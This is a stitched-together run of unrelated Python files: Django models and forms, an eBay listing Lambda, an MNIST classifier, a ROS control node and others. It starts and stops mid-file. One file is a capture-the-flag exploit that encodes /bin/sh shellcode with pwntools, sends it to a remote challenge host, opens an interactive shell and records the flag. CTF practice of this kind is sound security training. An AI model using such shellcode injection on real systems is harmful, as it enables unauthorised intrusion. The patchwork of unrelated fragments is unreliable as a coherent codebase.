            FlightSeat.objects.create(flight=self, seat=Seat.objects.create(number=c))

    def available_flight_depart_datetime(self):
        return bool(self.depart_datetime > timezone.now())

    def __str__(self):
        return self.flight_number

    class Meta:
        verbose_name = _('Flight')
        verbose_name_plural = _('Flights')
        db_table = 'flight'


class Seat(BaseModel):
    number = models.PositiveSmallIntegerField(verbose_name=_('number'))
    is_reserve = models.BooleanField(verbose_name=_('is reserve'), default=False)
    reserved_time = models.DateTimeField(default=None, null=True, blank=True)

    def __str__(self):
        return f'{self.number} - {self.is_reserve}'

    class Meta:
        verbose_name = _('Seat')
        verbose_name_plural = _('Seats')
        db_table = 'seat'


class FlightSeat(BaseModel):
    flight = models.ForeignKey(Flight, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('flight'))
    seat = models.ForeignKey(Seat, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('seat'))
    customer = models.ForeignKey(
        User, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('customer'),
        null=True, blank=True
    )

    def __str__(self):
        return f'{self.id}'

    def available_flight_seat(self):
        return bool(self.customer is None and not self.seat.is_reserve)

    class Meta:
        verbose_name = _('Flight Seat')
        verbose_name_plural = _('Flight Seats')
        db_table = 'flight_seat'
python
from .contract import Contract # noqa from .template import Template, TemplateError # noqa from .asyncio.contract import AsyncContract # noqa from .asyncio.template import AsyncTemplate # noqa __all__ = ( "Contract", "Template", "TemplateError", "AsyncContract", "AsyncTemplate" ) __version__ = '0.0.4'
python
# Generated by Django 2.2.9 on 2020-02-12 10:06 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('events', '0075_change_place_srid'), ] operations = [ migrations.AlterField( model_name='image', name='license', field=models.ForeignKey(default='event_only', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='images', to='events.License', verbose_name='License'), ), ]
python
import memcache
import simplejson


class SimplejsonWrapper(object):
    def __init__(self, file, protocol=None):
        self.file = file

    def dump(self, value):
        simplejson.dump(value, self.file)

    def load(self):
        return simplejson.load(self.file)

cache = memcache.Client(['127.0.0.1:11211'], pickler=SimplejsonWrapper, unpickler=SimplejsonWrapper)
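# A hypothetical usage sketch for the client configured above; the key and
# value are made up. set()/get() are the standard python-memcached calls.
if __name__ == '__main__':
    cache.set('greeting', {'text': 'hello'})
    print(cache.get('greeting'))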
python
from pwn import *

context.binary = elf = ELF("shellcoded")
r = remote("challenge.ctf.games", 32175)

# shellcode from pwn library
shellcode = list(asm(shellcraft.sh()))
# alternative: manually found shellcode online
#shellcode = list(b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05')

modified_sc = []

# reverse the action done by the binary
for i in range(len(shellcode)):
    if i & 1 != 0:
        v3 = 1
    else:
        v3 = -1
    # 1. '& 0xFF': brings a negative int back into the unsigned-byte range
    # 2. byte-order: little, since the arch is amd64-little
    # 3. the byte should be unsigned: adding to or subtracting from the original compiled
    #    shellcode wraps around (unsigned overflow) if the result is not within 0 to 0xff,
    #    which brings it back to the original byte in the shellcode
    modified_sc.append(((shellcode[i] + (v3 * i)) & 0xFF).to_bytes(1, byteorder='little', signed=False))

str_sc = b''.join(modified_sc)

# payload
print(str_sc)
r.sendline(str_sc)
r.interactive()

# flag{f27646ae277113d24c73dbc66a816721}
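# A small self-check sketch, assuming the binary applies the mirror image of
# the loop above (subtracting v3 * i from each byte). Running it before
# sendline() would confirm the encoding round-trips to the original shellcode.
def forward_transform(sc_bytes):
    out = []
    for i, b in enumerate(sc_bytes):
        v3 = 1 if i & 1 != 0 else -1
        out.append((b - v3 * i) & 0xFF)
    return out

assert forward_transform(list(str_sc)) == shellcode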
python
from kNUI.main import run
python
token = "your new token here"
python
from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.forms import PasswordResetForm, SetPasswordForm
from django.core.validators import MinLengthValidator
from django.db.models import Q
from django.contrib.auth.models import User

from social_django.views import complete

from accounts.models import Instructor


class UserForm(forms.ModelForm):
    """
    This form allows the user to edit their profile.

    On the profile page there are a couple of forms with required fields.
    The form_id field identifies which form was submitted.
    In the view: if form_id is present in request.POST, we pass the POST data
    to this form and validate it. If form_id is not found in request.POST,
    we do not validate this form.
    """
    form_id = forms.CharField(max_length=255, initial='user_form', widget=forms.HiddenInput())

    class Meta:
        model = User
        fields = ('form_id', 'first_name', 'last_name')
        widgets = {
            'id': forms.HiddenInput(),
            'form_id': forms.HiddenInput(),
        }


class ChangeEmailForm(forms.Form):
    """
    The form_id field identifies which form was submitted.
    In the view: if form_id is present in request.POST, we pass the POST data
    to this form and validate it. If form_id is not found in request.POST,
    we do not validate this form.
    """
    form_id = forms.CharField(max_length=255, initial='email_form', widget=forms.HiddenInput())
    email = forms.EmailField()

    def clean_email(self):
        email = self.cleaned_data['email']
        my_email = self.initial['email']
        if 'email' in self.changed_data:
            already_taken = User.objects.filter(
                Q(email=email) | Q(secondary__email=email)
            ).exclude(email=my_email)
            if already_taken:
                raise forms.ValidationError('This email is already taken.')
        return email

    def save(self, request, commit=True):
        """
        This form calls the `complete` function of python-social-auth.
        Sends an email with a confirmation link when the user changes their email.
        :param request: django request
        :param commit: save to db or not?
        :return:
        """
        if self.initial['email'] != self.cleaned_data['email']:
            return complete(request, 'email', force_update=True)


class InstructorForm(forms.ModelForm):
    """
    The form_id field identifies which form was submitted.
    In the view: if form_id is present in request.POST, we pass the POST data
    to this form and validate it. If form_id is not found in request.POST,
    we do not validate this form.
    """
    form_id = forms.CharField(max_length=255, initial='instructor_form', widget=forms.HiddenInput())

    class Meta:
        model = Instructor
        fields = ('form_id', 'user', 'institution')
        widgets = {
            'user': forms.HiddenInput(),
            'form_id': forms.HiddenInput(),
        }


class CreatePasswordForm(forms.ModelForm):
    """This form is used when the user has no password and wants to create one."""
    form_id = forms.CharField(max_length=255, initial='password_form', widget=forms.HiddenInput())
    confirm_password = forms.CharField(max_length=255, widget=forms.PasswordInput(),
                                       validators=[MinLengthValidator(6)])
    password = forms.CharField(max_length=255, widget=forms.PasswordInput(),
                               validators=[MinLengthValidator(6)])

    def clean(self):
        data = self.cleaned_data
        if data.get('password') != data.get('confirm_password'):
            self.add_error(None, 'Password and Confirm password fields don\'t match.')
            raise forms.ValidationError(
                {'password': 'Should be equal to the confirm password field.',
                 'confirm_password': 'Should be equal to the password field.'})
        return self.cleaned_data

    class Meta:
        model = User
        fields = ('password', 'confirm_password', 'form_id')

    def save(self, commit=True):
        self.instance.set_password(self.cleaned_data['password'])
        if commit:
            self.instance.save()
        return self.instance


class ChangePasswordForm(CreatePasswordForm):
    """
    The form_id field identifies which form was submitted.
    In the view: if form_id is present in request.POST, we pass the POST data
    to this form and validate it. If form_id is not found in request.POST,
    we do not validate this form.
    """
    current_password = forms.CharField(max_length=255, widget=forms.PasswordInput())

    def clean(self):
        data = self.cleaned_data
        if data.get('password') != data.get('confirm_password'):
            self.add_error('password', 'Should be equal to the confirm password field.')
            self.add_error('confirm_password', 'Should be equal to the password field.')
            self.add_error(None, 'Password and Confirm password fields don\'t match.')
        return self.cleaned_data

    def clean_current_password(self):
        current_pw = self.cleaned_data.get('current_password')
        user = authenticate(username=self.instance, password=current_pw)
        if user is None:
            self.add_error('current_password', 'The provided current password doesn\'t match your password.')
        return current_pw

    class Meta:
        model = User
        fields = ('current_password', 'password', 'confirm_password', 'form_id')


class DeleteAccountForm(forms.ModelForm):
    """
    The form_id field identifies which form was submitted.
    In the view: if form_id is present in request.POST, we pass the POST data
    to this form and validate it. If form_id is not found in request.POST,
    we do not validate this form.
    """
    form_id = forms.CharField(max_length=255, initial='delete_account_form', widget=forms.HiddenInput())
    confirm_delete_account = forms.BooleanField(
        required=True,
        widget=forms.HiddenInput(),
        initial=False
    )

    def save(self, commit=True):
        self.instance.is_active = False
        if commit:
            self.instance.save()
        return self.instance

    class Meta:
        model = User
        fields = ('form_id', 'confirm_delete_account')
        widgets = {
            'id': forms.HiddenInput(),
        }


class CustomPasswordResetForm(PasswordResetForm):
    """
    The form_id field identifies which form was submitted.
    In the view: if form_id is present in request.POST, we pass the POST data
    to this form and validate it. If form_id is not found in request.POST,
    we do not validate this form.
    """
    def clean_email(self):
        user = User.objects.filter(email=self.cleaned_data['email']).first()
        if not user:
            raise forms.ValidationError('No registered account with such an email.')
        if not user.has_usable_password():
            raise forms.ValidationError(
                'The user with this email does not have a password; most likely you registered via a social network.')
        return self.cleaned_data['email']


class SocialForm(forms.ModelForm):
    institution = forms.CharField(required=True)
    what_do_you_teach = forms.CharField(required=True)

    class Meta:
        model = Instructor
        fields = (
            'user',
            'institution',
            'what_do_you_teach'
        )
        widgets = {
            'user': forms.HiddenInput(),
        }


class CustomSetPasswordForm(SetPasswordForm):
    def __init__(self, user, *args, **kwargs):
        super(CustomSetPasswordForm, self).__init__(user, *args, **kwargs)
        self.fields['new_password1'].validators.append(MinLengthValidator(6))
        self.fields['new_password2'].validators.append(MinLengthValidator(6))
python
import unittest
from mock import patch, MagicMock

from rawes.elastic import Elastic
from requests.models import Response
from rawes.http_connection import HttpConnection


class TestConnectionPooling(unittest.TestCase):
    """Connection pooling was added on top of Rawes, it wasn't designed in
    from the beginning. We need some tests to ensure our expectations of the
    connection pooling are met.
    """

    def testBasicRoundRobin(self):
        """
        Set up a client with three different hosts to connect to, make
        multiple calls and check that each call goes to a different host in a
        Round Robin fashion
        """
        hosts = ['http://someserver1:9200', 'http://someserver2:9200',
                 'http://someserver3:9200']
        es = Elastic(hosts, connection_pool_kwargs={'dead_timeout': 10})
        with patch('rawes.http_connection.requests.Session.request',
                   MagicMock(return_value=None)) as request:
            request.return_value = Response()
            called = []
            for _ in range(len(hosts)):
                es.get()
                # Save a list of called hosts (and remove trailing /)
                called.append(request.call_args[0][1][:-1])

            # Check against original hosts list
            self.assertSetEqual(set(hosts), set(called),
                                'All hosts in connection pool should be used')

            called_again = []
            for _ in range(len(hosts)):
                es.get()
                # Call the same hosts again (don't forget about the trailing /)
                called_again.append(request.call_args[0][1][:-1])

            # Check they were called in the same order as before
            self.assertListEqual(called, called_again,
                                 'Round robin order wasn\'t preserved')
python
import os.path

__all__ = [
    "__title__", "__summary__", "__url__", "__version__", "__author__",
    "__email__", "__license__"
]

try:
    base_dir = os.path.dirname(os.path.abspath(__file__))
except NameError:
    base_dir = None

__title__ = "makebib"
__summary__ = "A simple script to generate a local bib file from a central database."
__url__ = 'https://gitlab.com/Verner/makebib'
__version__ = "0.2.2"
__author__ = "Jonathan L. Verner"
__email__ = "[email protected]"
__license__ = "MIT"
python
import json
import os
import sys
import logging
import traceback
import re
import boto3
import time

# helper functions
from queue_wrapper import *
from message_wrapper import *

# packages for listing to ebay
from ebaysdk.trading import Connection

# packages for the item info formatter
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

sqs = boto3.resource('sqs')

LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)

# Setting chrome options for our browser
user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36'
chrome_options = Options()
# chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-gpu")
# chrome_options.add_argument("--no-sandbox")  # linux only
chrome_options.add_argument("--headless")
chrome_options.add_argument(f'user-agent={user_agent}')
# chrome_options.add_argument("start-maximized")
# chrome_options.add_argument("disable-infobars")


def strip_text(string, rejoin_str=False):
    """removes all punctuation from the string and returns a list of words

    <div class="price" data-auto="main-price">
        Orig. $190.00
    </div>
    -> ['Orig', '190', '00']
    rejoin_str == True -> Orig 190 00

    :param string: string containing alphanumeric characters to be split into words
    :param rejoin_str: when True, rejoin the words with spaces into one string
    """
    split_words = re.findall(r"[\w']+", string)
    # if we want to make the string into a sentence again
    if rejoin_str:
        # join the words together with spaces between them
        return " ".join(split_words)
    # return the original words split into a list
    return split_words


def get_macys_item_info(soup):
    """return the needed json/dictionary of a macys item in order to post it to eBay

    :param soup: BeautifulSoup() instance
    """
    item_details = {}

    # TITLE
    # filter title solely for words
    item_details["Title"] = strip_text(soup.find("div", attrs={"data-el": "product-title"}).text, rejoin_str=True)

    # DESCRIPTION
    item_details["Description"] = soup.find(attrs={"data-el": "product-details"}).text

    # IMAGES
    item_details["PictureDetails"] = []
    # for each img item in product detail
    for img_element in soup.find("ul", class_="c-reset scroller swiper animated").find_all("img"):
        # get elt xml
        xml_str = str(img_element)
        # get info after src attribute
        url = xml_str.split(" src=\"")[1]
        # clip info after next quote
        url = url[:url.find("\" ")]
        # append the image url
        item_details["PictureDetails"] += [{"PictureURL": url}]

    # PRICE
    # get original price html element
    price_html_text = soup.find(attrs={"data-auto": "main-price"}).text
    without_punctuation = strip_text(price_html_text)
    # get price, assuming it is the second element
    item_details["StartPrice"] = without_punctuation[1]

    ################# START ITEM SPECIFICS #################
    item_details["ItemSpecifics"] = {"NameValueList": [
        {"Name": "SizeType", "Value": "Regular"},
        # {"Name": "Inseam", "Value": "33"},
        # {"Name": "Sleeve Style", "Value": "Short Sleeve"}
    ]}
    name_value_list = item_details["ItemSpecifics"]["NameValueList"]

    # --> Color
    name_value_list.append({
        "Name": "Color",
        "Value": soup.find(attrs={"data-auto": "selected-color"}).text
    })

    # --> Brand
    name_value_list.append({
        "Name": "Brand",
        "Value": strip_text(soup.find(attrs={"data-auto": "product-brand"}).text, rejoin_str=True)
    })

    # --> Size
    name_value_list.append({
        "Name": "Size",
        "Value": strip_text(
            soup.find("li", class_="swatch-itm static", attrs={"aria-disabled": "false"}).text
        )[0]
    })

    # breadcrumbs --> ["Macy's", 'Women', 'Coats']
    breadcrumbs = strip_text(
        soup.find("div", class_="breadcrumbs-container").text)

    # --> Department
    department = breadcrumbs[1]
    name_value_list.append({"Name": "Department", "Value": department})

    # --> Style
    style = breadcrumbs[-1]
    name_value_list.append({"Name": "Style", "Value": style})

    # --> Type
    item_type = breadcrumbs[-1]
    name_value_list.append({"Name": "Type", "Value": item_type})
    ################# END ITEM SPECIFICS #################

    return item_details


def format_item_details(message):
    """Formats webpage data for the product into an ebay-friendly template

    :param message: message object representing message in the queue
    """
    item_details = None
    host_functions = {
        "macys": get_macys_item_info
    }

    driver = webdriver.Chrome("./chromedriver", options=chrome_options)
    # Set the window size
    driver.set_window_size(1500, 1280)

    # get the url from the body of the sqs record
    item_url = message.body
    # go to said item's webpage in selenium
    driver.get(item_url)
    # wait a specified amount of time for elements to be updated
    time.sleep(3)
    # pass the output to BS4
    soup = BeautifulSoup(driver.page_source, "xml")
    # close the window (all tabs)
    driver.quit()

    # get the specific host
    host = item_url.split(".")[1]

    # use function based on host
    try:
        # try to find our host url's function
        try:
            get_item_info = host_functions[host]
        except:
            LOGGER.error(f"failed to find get_item_info function for {host}")
            traceback.print_exc()
        # attempt to fetch the details for this item
        item_details = get_item_info(soup)
    except:
        LOGGER.error(f"failed to finish getting item info from {host}")
        traceback.print_exc()
        raise ValueError

    return item_details


def list_ebay_item(item_details):
    LOGGER.info(
        f"Hello from the eBay Item Lister Lambda! Now listing item: {item_details['Title']}"
    )

    if os.environ["ENV"] == "SANDBOX":
        domain = "api.sandbox.ebay.com"
    elif os.environ["ENV"] == "PRODUCTION":
        domain = "api.ebay.com"
    else:
        raise ValueError(f"Invalid market_environment: {os.environ['ENV']}")

    api = Connection(
        config_file=os.environ.get('EBAY_YAML'),
        domain=domain,
        appid=os.environ["CLIENT_ID"],
        certid=os.environ["DEV_ID"],
        devid=os.environ["CLIENT_SECRET"],
        token=os.environ["TOKEN"],
        password=os.environ["PASSWORD"],
        debug=True
    )

    # create set of style and dept for addition to category search
    title_specifics = set(["Style", "Department"])
    item_specifics = item_details["ItemSpecifics"]["NameValueList"]
    # get the suggested ebay category
    category_response = api.execute(
        'GetSuggestedCategories',
        {
            # concatenate the style and department
            'Query': " ".join(
                [item["Value"] for item in item_specifics if item["Name"] in title_specifics]
                + [item_details["Title"]]
            )
        }
    )
    # unwrap suggested categories
    suggested_categories = category_response.dict()['SuggestedCategoryArray']['SuggestedCategory']
    # set primary category
    primary_category_id = suggested_categories[0]["Category"]["CategoryID"]

    request = {
        "Item": {
            **item_details,
            # "Title": title,
            "Country": "US",
            "Location": "US",
            "Site": "US",
            "ConditionID": "1000",  # new for now
            "PaymentMethods": "PayPal",  # paypal for now
            "PayPalEmailAddress": os.environ["EMAIL"],
            # Clothing, Shoes & Accessories
            "PrimaryCategory": {"CategoryID": primary_category_id},
            # "PrimaryCategory": {"CategoryID": "57989"},
            # "Description": description,  # description passed in from elsewhere
            "Quantity": "1",
            "ListingDuration": "GTC",  # GTC = Good 'Til Cancelled
            # "StartPrice": price,
            "Currency": "USD",
            "ListingType": "FixedPriceItem",
            # "ItemSpecifics": {
            #     "NameValueList": [
            #         {"Name": "Color", "Value": "Black"},
            #         {"Name": "Brand", "Value": "Alternative"},
            #         {"Name": "Size", "Value": "M"},
            #         {"Name": "SizeType", "Value": "Regular"},
            #         {"Name": "Inseam", "Value": "33"},
            #         {"Name": "Style", "Value": "Polo Shirt"},
            #         {"Name": "Sleeve Style", "Value": "Short Sleeve"},
            #         {"Name": "Type", "Value": "Short Sleeve"},
            #         {"Name": "Department", "Value": "Men"}
            #     ]
            # },
            # "PictureDetails": [
            #     { "PictureURL": "http://www.itcircleconsult.com/eb2017/4a.png" }
            # ],
            "ReturnPolicy": {
                # to avoid handling two-step returns to two different places, we will
                "ReturnsAcceptedOption": "ReturnsNotAccepted",
                # TODO: REMOVE THESE COMMENTS upon successful api call
                # "RefundOption": "MoneyBack",
                # "ReturnsWithinOption": "Days_30",
                # "Description": "If you are not satisfied, return the keyboard.",
                # "ShippingCostPaidByOption": "Seller"
            },
            "ShippingDetails": {
                "ShippingServiceOptions": {
                    "FreeShipping": "True",
                    "ShippingService": "USPSMedia"
                }
            },
            # Shorter dispatch times are always better if you can reliably meet them.
            "DispatchTimeMax": "2"
        }
    }

    # trigger request and log the response to cloudwatch
    response = api.execute("AddItem", request)
    print(response.status)
    return response


def lambda_handler(event, context):
    """lambda function to list items to eBay's sandbox or production marketplace"""
    # get our sqs queue
    sqs_queue = get_queue(os.environ["SQS_QUEUE_NAME"])
    # fetch the sqs queue messages in batches
    sqs_messages = receive_messages(queue=sqs_queue, max_number=2, wait_time=0)

    if len(sqs_messages) == 0:
        # The server encountered an unexpected condition which prevented it from fulfilling the request.
        return {"status": 500, "body": "empty queue"}

    # var for number of successful ebay postings
    successes = 0
    # for each message
    for msg in sqs_messages:
        try:
            # format the item in the message for posting
            item_details = format_item_details(msg)
            # list the item
            resp = list_ebay_item(item_details)
            LOGGER.warn(resp.text)
            successes += 1
        except:
            LOGGER.error(f"{msg.body} failed to be posted to ebay")
            traceback.print_exc()

    if successes == 2:
        LOGGER.info(f"{sqs_messages} successfully posted to ebay")
        return {"status": 200}  # full success
    elif successes == 1:
        # The HTTP 206 Partial Content status indicates that the request succeeded
        # for only part of the batch
        return {"status": 206}
    else:  # successes == 0
        # The server encountered an unexpected condition which prevented it from fulfilling the request.
        return {"status": 500}
# TEST OBJECTS #################################### event = { "detail": { "title": "Alternative Gray Citadel Joggers", "price": "29.50", "market_environment": os.environ["ENV"], "description": "they're pretty good, just a lil worn and the drawstring is frayed", "quantity": "1" } } event2 = { "message": [ { "messageId": "059f36b4-87a3-44ab-83d2-661975830a7d", "receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a...", "body": { "url": "https://www.macys.com/shop/product/calvin-klein-shine-hooded-packable-down-puffer-coat-created-for-macys?ID=11031427&CategoryID=3536,https://www.macys.com/shop/product/cole-haan-box-quilt-down-puffer-coat?ID=2813247&CategoryID=3536" }, "attributes": { "ApproximateReceiveCount": "1", "SentTimestamp": "1545082649183", "SenderId": "AIDAIENQZJOLO23YVJ4VO", "ApproximateFirstReceiveTimestamp": "1545082649185" }, "messageAttributes": {}, "md5OfBody": "098f6bcd4621d373cade4e832627b4f6", "eventSource": "aws:sqs", "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue", "awsRegion": "us-east-2" } ] } if __name__ == "__main__": # run test code context = None # print results print(lambda_handler(event2, None)) # { # 'Category': # {'CategoryID': '2887', 'CategoryName': 'Soccer-International # Clubs', 'CategoryParentID': ['64482', '24409'], 'CategoryParentName': # ['Sports Mem, Cards &amp; Fan Shop', 'Fan Apparel &amp; Souvenirs']}, # 'PercentItemFound': '89'}
python
# -*- coding: utf-8 -*- """ Created on Fri Jul 26 15:47:35 2019 @author: Dominic """ import numpy as np def generate_points_on_hypercube(nsamples,origin,poffs,p=None,uvecs=None): if uvecs is None: epsilon = [] bounds = [] for i in range(len(origin)): origin_c = np.copy(origin) poffs_c = np.copy(poffs) origin_c[i] = poffs_c[i] bounds += [origin_c] print(origin_c,poffs_c) epsilon += [np.linalg.norm(origin_c-poffs_c)] epsilon = np.array(epsilon) if p is None: p = epsilon/epsilon.sum() print(p) points = [] for i in range(nsamples): face = np.random.choice(len(origin),p=p) points+=[np.random.uniform(bounds[face],poffs)] return np.array(points) def clean_pointset(pointset): pointset = np.copy(pointset) for point in pointset: toremove = np.where(np.all(np.less(pointset,point),axis=1))[0] pointset = np.delete(pointset,toremove,axis=0) #for point in pointset: # print(np.less(pointset,point)) # print(np.where(np.logical_all(pointset<point))) return pointset if __name__ == "__main__": p = generate_points_on_hypercube(200,[120,40],[-200,-300],None) print(p) import matplotlib.pyplot as plt plt.scatter(*p.T) plt.show()
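# A tiny illustration of clean_pointset (values made up): a point that is
# strictly smaller than some other point in every coordinate is dropped,
# leaving only the non-dominated points.
if __name__ == "__main__":
    demo = np.array([[1.0, 1.0], [2.0, 2.0], [0.5, 3.0]])
    print(clean_pointset(demo))  # [1, 1] is dominated by [2, 2] and removed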
python
from bot import merger_bot

WEBHOOK_HOST = merger_bot.webhook_host
WEBHOOK_PORT = merger_bot.webhook_port

WEBHOOK_SSL_CERT = './SSL/webhook_cert.pem'  # Path to the certificate
WEBHOOK_SSL_PRIV = './SSL/webhook_pkey.pem'  # Path to the private key

WEBHOOK_URL_BASE = "https://%s:%s" % (WEBHOOK_HOST, WEBHOOK_PORT)
WEBHOOK_URL_PATH = "/%s/" % merger_bot.telegram_token

OUR_URL = "put yours here"
python
from mnist import MNIST
import sklearn.metrics as metrics
import numpy as np

NUM_CLASSES = 10


def load_dataset():
    mndata = MNIST('./data/')
    X_train, labels_train = map(np.array, mndata.load_training())
    X_test, labels_test = map(np.array, mndata.load_testing())
    X_train = X_train/255.0
    X_test = X_test/255.0
    X_train = X_train[:,:]
    X_test = X_test[:,:]
    return (X_train, labels_train), (X_test, labels_test)


def train(X_train, y_train):
    ''' Build a model from X_train -> y_train '''
    dim = X_train.shape[1]
    label = y_train.shape[1]
    mat1 = np.zeros((dim, dim))
    mat2 = np.zeros((dim, label))
    n = 0
    for x_i in X_train:
        y_i = y_train[n]
        mat1 += np.outer(x_i, x_i)
        mat2 += np.outer(x_i, y_i)
        n += 1
    # regularize until X^T X is full rank, then solve the normal equations
    while np.linalg.matrix_rank(mat1) != dim:
        mat1 = mat1 + 0.0003*np.eye(dim)
    model = np.dot(np.linalg.inv(mat1), mat2)
    return model


def one_hot(labels_train):
    '''Convert categorical labels 0,1,2,....9 to standard basis vectors in R^{10} '''
    label_int = np.array(labels_train)
    label_bool = np.zeros((labels_train.size, 10), dtype=int)
    label_bool[np.arange(labels_train.size), label_int] = 1
    return label_bool


def predict(x, y, model):
    ''' From model and data points, count correct prediction vectors '''
    hits = 0
    DataSize = y.shape[0]
    for m in range(DataSize):
        xx = x[m]
        Predict_values = list(np.dot(model.T, xx))
        winners = [i for i, xx in enumerate(Predict_values) if xx == max(Predict_values)]
        winner = winners[len(winners)-1]
        z = [0 for xx in Predict_values]
        z[winner] = 1
        prediction = z
        actual = list(y[m])
        if prediction == actual:
            hits += 1
    return hits


if __name__ == "__main__":
    (X_train, labels_train), (X_test, labels_test) = load_dataset()
    y_train = one_hot(labels_train)
    y_test = one_hot(labels_test)

    model = train(X_train, y_train)
    train_hits = predict(X_train, y_train, model)
    test_hits = predict(X_test, y_test, model)
    Train_accuracy = train_hits/float(y_train.shape[0])*100
    Test_accuracy = test_hits/float(y_test.shape[0])*100
    print("Training Accuracy = " + str(Train_accuracy) + "%", "(" + str(train_hits) + "/" + str(y_train.shape[0]) + ")")
    print("Test Accuracy = " + str(Test_accuracy) + "%", "(" + str(test_hits) + "/" + str(y_test.shape[0]) + ")")
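# A sketch of an equivalent way (not from the original) to get a
# ridge-regularized least-squares solution without forming an explicit
# inverse: solve (X^T X + reg * I) W = X^T Y. np.linalg.solve is usually
# faster and numerically safer than inv(); note it applies the
# regularization unconditionally rather than via the rank-check loop above.
def train_solve(X_train, y_train, reg=0.0003):
    dim = X_train.shape[1]
    return np.linalg.solve(X_train.T.dot(X_train) + reg * np.eye(dim),
                           X_train.T.dot(y_train))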
python
import djclick as click from core.utils import get_approximate_date def gather_event_date_from_prompt(): date = None while date is None: date_str = click.prompt( click.style( "What is the date of the event? (Format: DD/MM/YYYY or MM/YYYY)", bold=True, fg='yellow')) date = get_approximate_date(date_str) if date is None: click.secho("Wrong format! Try again :)", bold=True, fg='red') return date
python
# -*- coding: utf-8 -*-

from __future__ import absolute_import

from quixote.errors import TraversalError

from vilya.views.util import jsonize, http_method
from vilya.models.linecomment import PullLineComment
from vilya.models.project import CodeDoubanProject
from vilya.libs.template import st

_q_exports = []


class CodeReviewUI(object):
    _q_exports = ['delete', 'edit']

    def __init__(self, proj_name):
        self.proj_name = proj_name
        self.code_review = None

    def _q_lookup(self, request, comment_id):
        comment = PullLineComment.get(comment_id)
        if not comment:
            raise TraversalError(
                "Unable to find comment %s" % comment_id)
        else:
            self.code_review = comment
        return self

    @jsonize
    def delete(self, request):
        user = request.user
        if self.code_review.author == user.name:
            ok = self.code_review.delete()
            if ok:
                return {'r': 1}  # FIXME: here r=1 means success, inconsistent with the other endpoints
        return {'r': 0}

    @jsonize
    @http_method(methods=['POST'])
    def edit(self, request):
        user = request.user
        project = CodeDoubanProject.get_by_name(self.proj_name)
        content = request.get_form_var(
            'pull_request_review_comment', '').decode('utf-8')
        if self.code_review.author == user.name:
            self.code_review.update(content)
            linecomment = PullLineComment.get(self.code_review.id)
            pullreq = True
            return dict(
                r=0, html=st('/pull/ticket_linecomment.html', **locals()))
        return dict(r=1)
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from std_msgs.msg import Float32, UInt8 from sensor_msgs.msg import Image, CompressedImage import enum import time import rospy from cv_bridge import CvBridge class ControlNode: def __init__(self): self.traffic_mission_start = False self.parking_mission_start = False self.crossbar_mission_start = False self.tunnel_mission_start = False self.intersection_mission_start = False self.construction_mission_start = False self.traffic_mission_success = False self.parking_mission_success = False self.crossbar_mission_success = False self.tunnel_mission_success = False self.intersection_mission_success = False self.construction_mission_success = False self.mode_step = enum.Enum('step_of_mode', 'normal_mode traffic_mode parking_mode crossbar_mode tunnel_mode intersection_mode construction_mode') #self.mode_num = self.mode_step.normal_mode.value self.mode_num = self.mode_step.traffic_mode.value #self.mode_num = self.mode_step.crossbar_mode.value #self.mode_num = self.mode_step.parking_mode.value #self.mode_num = self.mode_step.tunnel_mode.value #self.mode_num = self.mode_step.intersection_mode.value #self.mode_num = self.mode_step.construction_mode.value self.sequence_num = 1 self.driving_time_pre = time.time() self.mission_time_pre = time.time() self.sign_check_time_pre = time.time() self.pre_check_time_pre = time.time() self.mission_timeout_pre = time.time() self.mission_time_delay = 0.1 self.mission_timeout = 0.0 self.img_status = 'compressed' # give 'raw' or 'compressed' if self.img_status == 'raw': self.cv_bridge = CvBridge() self.sub_img_cam = rospy.Subscriber('/image_raw', Image, self.cb_image_receive, queue_size=1) elif self.img_status == 'compressed': self.sub_img_cam = rospy.Subscriber('/image_raw/compressed', CompressedImage, self.cb_image_receive, queue_size=1) self.sub_seq_change = rospy.Subscriber('/mission/seq/change', UInt8, self.cb_sequence_num, queue_size=1) self.sub_delay_change = rospy.Subscriber('/mission/time/delay', Float32, self.cb_delay_change, queue_size=1) self.sub_timeout_change = rospy.Subscriber('/mission/time/timeout', Float32, self.cb_timeout_change, queue_size=1) self.pub_img_driving = rospy.Publisher('/controller/image/driving', CompressedImage, queue_size=1) self.pub_img_sign = rospy.Publisher('/controller/image/sign', CompressedImage, queue_size=1) self.pub_img_mission = rospy.Publisher('/controller/image/mission', CompressedImage, queue_size=1) self.pub_seq_normal = rospy.Publisher('/controller/seq/normal', UInt8, queue_size=1) self.pub_seq_traffic = rospy.Publisher('/controller/seq/traffic', UInt8, queue_size=1) self.pub_seq_parking = rospy.Publisher('/controller/seq/parking', UInt8, queue_size=1) self.pub_seq_crossbar = rospy.Publisher('/controller/seq/crossbar', UInt8, queue_size=1) self.pub_seq_tunnel = rospy.Publisher('/controller/seq/tunnel', UInt8, queue_size=1) self.pub_seq_intersection = rospy.Publisher('/controller/seq/intersection', UInt8, queue_size=1) self.pub_seq_construction = rospy.Publisher('/controller/seq/construction', UInt8, queue_size=1) loop_rate = rospy.Rate(100) while not rospy.is_shutdown(): if self.mode_num == self.mode_step.normal_mode.value: self.fn_normal_publish() else: self.fn_mission_publish() loop_rate.sleep() def fn_normal_publish(self): time_now = time.time() if self.traffic_mission_start: rospy.loginfo('mode change : traffic mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.traffic_mode.value self.sequence_num = 1 elif self.parking_mission_start: 
rospy.loginfo('mode change : parking mode')
            self.mission_timeout_pre = time_now
            self.mode_num = self.mode_step.parking_mode.value
            self.sequence_num = 1
        elif self.crossbar_mission_start:
            rospy.loginfo('mode change : crossbar mode')
